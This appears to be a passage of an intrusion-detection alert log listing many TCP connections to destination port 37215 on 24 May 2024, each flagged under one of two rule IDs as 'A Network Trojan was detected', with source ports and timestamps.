              SID:2835222
              Source Port:59956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491962
              SID:2829579
              Source Port:44906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152932
              SID:2835222
              Source Port:33560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054197
              SID:2829579
              Source Port:57686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078070
              SID:2829579
              Source Port:42610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486973
              SID:2835222
              Source Port:38366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435294
              SID:2835222
              Source Port:58878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.041207
              SID:2829579
              Source Port:56692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965418
              SID:2829579
              Source Port:53918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538647
              SID:2829579
              Source Port:38064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062741
              SID:2835222
              Source Port:44940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589038
              SID:2835222
              Source Port:40752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570645
              SID:2829579
              Source Port:41750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484385
              SID:2835222
              Source Port:55736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595467
              SID:2829579
              Source Port:41096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188817
              SID:2835222
              Source Port:43088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303291
              SID:2829579
              Source Port:47254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.869593
              SID:2829579
              Source Port:35130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117308
              SID:2835222
              Source Port:34826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.630725
              SID:2829579
              Source Port:50404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057284
              SID:2835222
              Source Port:47612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431227
              SID:2835222
              Source Port:54854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432204
              SID:2835222
              Source Port:41262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049215
              SID:2829579
              Source Port:57440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230807
              SID:2829579
              Source Port:60156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.707856
              SID:2835222
              Source Port:54502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446690
              SID:2835222
              Source Port:58562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049478
              SID:2829579
              Source Port:33278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125485
              SID:2829579
              Source Port:56134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575230
              SID:2829579
              Source Port:49962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249924
              SID:2829579
              Source Port:42530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060983
              SID:2829579
              Source Port:44906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.881628
              SID:2835222
              Source Port:47400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254437
              SID:2835222
              Source Port:49522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486470
              SID:2829579
              Source Port:45026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061799
              SID:2835222
              Source Port:55362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.146955
              SID:2835222
              Source Port:59194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.347070
              SID:2835222
              Source Port:39948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856947
              SID:2829579
              Source Port:35220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456202
              SID:2829579
              Source Port:52370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636011
              SID:2835222
              Source Port:55562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695794
              SID:2835222
              Source Port:56874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406573
              SID:2835222
              Source Port:42130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.702613
              SID:2829579
              Source Port:38846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308558
              SID:2829579
              Source Port:41772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725133
              SID:2829579
              Source Port:42996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570616
              SID:2829579
              Source Port:43074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625670
              SID:2829579
              Source Port:33850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534363
              SID:2835222
              Source Port:50262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054309
              SID:2835222
              Source Port:51734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347553
              SID:2829579
              Source Port:39522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989911
              SID:2829579
              Source Port:55658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105729
              SID:2829579
              Source Port:40326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071542
              SID:2829579
              Source Port:53782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186941
              SID:2835222
              Source Port:51340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535360
              SID:2835222
              Source Port:53498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099866
              SID:2835222
              Source Port:48094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595503
              SID:2829579
              Source Port:44784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166340
              SID:2829579
              Source Port:56930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249987
              SID:2829579
              Source Port:59756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589115
              SID:2829579
              Source Port:42968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249806
              SID:2835222
              Source Port:34742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099730
              SID:2829579
              Source Port:40136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128270
              SID:2829579
              Source Port:48018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694708
              SID:2835222
              Source Port:33046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664486
              SID:2835222
              Source Port:58476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726767
              SID:2835222
              Source Port:58808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456962
              SID:2835222
              Source Port:42730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198796
              SID:2835222
              Source Port:60018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270407
              SID:2829579
              Source Port:56158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537305
              SID:2835222
              Source Port:42146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.980979
              SID:2835222
              Source Port:48590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395976
              SID:2835222
              Source Port:39954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449206
              SID:2835222
              Source Port:57578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397225
              SID:2829579
              Source Port:35346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.515568
              SID:2829579
              Source Port:41328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079761
              SID:2829579
              Source Port:35766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210224
              SID:2835222
              Source Port:45206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.121516
              SID:2829579
              Source Port:52376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859039
              SID:2829579
              Source Port:35944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.981144
              SID:2835222
              Source Port:52120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187451
              SID:2835222
              Source Port:38156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062701
              SID:2835222
              Source Port:43414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.980862
              SID:2829579
              Source Port:39452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341374
              SID:2835222
              Source Port:39730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.433197
              SID:2835222
              Source Port:36906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856910
              SID:2829579
              Source Port:51830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.884602
              SID:2829579
              Source Port:60814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459829
              SID:2829579
              Source Port:60282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639388
              SID:2835222
              Source Port:33126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.251717
              SID:2829579
              Source Port:38616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486515
              SID:2829579
              Source Port:52106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397802
              SID:2829579
              Source Port:55090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.964020
              SID:2835222
              Source Port:35748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152785
              SID:2835222
              Source Port:36636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517863
              SID:2829579
              Source Port:57084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395464
              SID:2829579
              Source Port:40794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.701587
              SID:2835222
              Source Port:34838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726573
              SID:2835222
              Source Port:45758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374073
              SID:2829579
              Source Port:60378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926708
              SID:2829579
              Source Port:50448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625297
              SID:2835222
              Source Port:33004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235569
              SID:2835222
              Source Port:54204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574614
              SID:2835222
              Source Port:54990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856881
              SID:2829579
              Source Port:41710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799188
              SID:2835222
              Source Port:49816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965409
              SID:2835222
              Source Port:41016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100963
              SID:2829579
              Source Port:53670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727002
              SID:2835222
              Source Port:57622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154227
              SID:2835222
              Source Port:34250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.299980
              SID:2835222
              Source Port:35104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332247
              SID:2835222
              Source Port:43690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161635
              SID:2835222
              Source Port:34716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118405
              SID:2835222
              Source Port:34620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459509
              SID:2835222
              Source Port:33618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535215
              SID:2829579
              Source Port:50844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579207
              SID:2829579
              Source Port:39764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121987
              SID:2829579
              Source Port:45470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575477
              SID:2829579
              Source Port:35842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725716
              SID:2829579
              Source Port:34874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235217
              SID:2829579
              Source Port:43916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432214
              SID:2835222
              Source Port:50664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167451
              SID:2829579
              Source Port:46946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154135
              SID:2829579
              Source Port:47024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189047
              SID:2829579
              Source Port:37244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231807
              SID:2829579
              Source Port:53726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.159747
              SID:2835222
              Source Port:52448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.677412
              SID:2829579
              Source Port:44496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873784
              SID:2835222
              Source Port:48050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204761
              SID:2835222
              Source Port:53808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329686
              SID:2829579
              Source Port:37102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504976
              SID:2835222
              Source Port:57618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.824698
              SID:2835222
              Source Port:60082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594710
              SID:2829579
              Source Port:59532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397211
              SID:2829579
              Source Port:42102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.837391
              SID:2835222
              Source Port:45870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480845
              SID:2829579
              Source Port:57828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057284
              SID:2835222
              Source Port:41310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545001
              SID:2829579
              Source Port:44816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535516
              SID:2829579
              Source Port:56656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554097
              SID:2829579
              Source Port:59094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108548
              SID:2835222
              Source Port:47246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189004
              SID:2835222
              Source Port:56126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077038
              SID:2835222
              Source Port:37828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.077889
              SID:2829579
              Source Port:42914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.418941
              SID:2829579
              Source Port:35212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100742
              SID:2829579
              Source Port:35192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482590
              SID:2829579
              Source Port:50034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642145
              SID:2835222
              Source Port:35554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625630
              SID:2829579
              Source Port:43770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109518
              SID:2835222
              Source Port:44648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396167
              SID:2829579
              Source Port:36412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.629466
              SID:2835222
              Source Port:44820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.546211
              SID:2829579
              Source Port:50302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542171
              SID:2835222
              Source Port:40722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155817
              SID:2829579
              Source Port:56130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162997
              SID:2835222
              Source Port:53762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.879368
              SID:2835222
              Source Port:34440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076304
              SID:2835222
              Source Port:53414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308541
              SID:2829579
              Source Port:53064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601463
              SID:2829579
              Source Port:43994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123133
              SID:2835222
              Source Port:58092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506502
              SID:2829579
              Source Port:51974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421617
              SID:2829579
              Source Port:47220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279500
              SID:2835222
              Source Port:52332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866272
              SID:2835222
              Source Port:54078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245450
              SID:2829579
              Source Port:56602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232429
              SID:2829579
              Source Port:40922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395598
              SID:2835222
              Source Port:45774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.796496
              SID:2829579
              Source Port:60192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491801
              SID:2835222
              Source Port:55056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505644
              SID:2835222
              Source Port:37964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.628103
              SID:2829579
              Source Port:34252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.147097
              SID:2829579
              Source Port:46984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574781
              SID:2835222
              Source Port:52534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547095
              SID:2829579
              Source Port:59090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395727
              SID:2835222
              Source Port:56210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519172
              SID:2835222
              Source Port:47932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154332
              SID:2829579
              Source Port:58442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230966
              SID:2835222
              Source Port:37614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543525
              SID:2829579
              Source Port:35952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166954
              SID:2835222
              Source Port:51522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700531
              SID:2835222
              Source Port:58480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858452
              SID:2835222
              Source Port:56160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300026
              SID:2835222
              Source Port:54632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151134
              SID:2835222
              Source Port:41698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053457
              SID:2829579
              Source Port:52472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552225
              SID:2835222
              Source Port:48552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118787
              SID:2835222
              Source Port:33678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313367
              SID:2835222
              Source Port:47900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598167
              SID:2829579
              Source Port:46764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313675
              SID:2835222
              Source Port:45088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430703
              SID:2835222
              Source Port:44658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878221
              SID:2829579
              Source Port:48294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624843
              SID:2835222
              Source Port:49714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450507
              SID:2835222
              Source Port:59226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358888
              SID:2829579
              Source Port:46016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.752614
              SID:2829579
              Source Port:55318
              Destination Port:37215
